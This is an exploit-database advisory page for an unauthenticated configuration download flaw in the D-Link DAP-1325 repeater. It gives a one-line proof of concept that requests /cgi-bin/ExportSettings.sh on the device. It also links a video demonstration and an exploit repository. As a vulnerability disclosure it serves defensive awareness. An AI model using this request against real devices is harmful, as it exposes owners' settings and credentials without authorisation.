D-Link DAP-1325 Insecure Direct Object Reference

2023.07.06

Credit: ieduardogoncalves

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms
1) Description
Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
IN MY CASE,
Tested repeater IP: http://192.168.0.21/
Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
2) Proof of Concept
Step 1: Go to
Repeater Login Page : http://192.168.0.21/
Step 2:
Add the payload to URL.
Payload:
http://{ip}/cgi-bin/ExportSettings.sh
Payload:
https://github.com/eeduardogoncalves/exploit

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

D-Link DAP-1325 Insecure Direct Object Reference

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.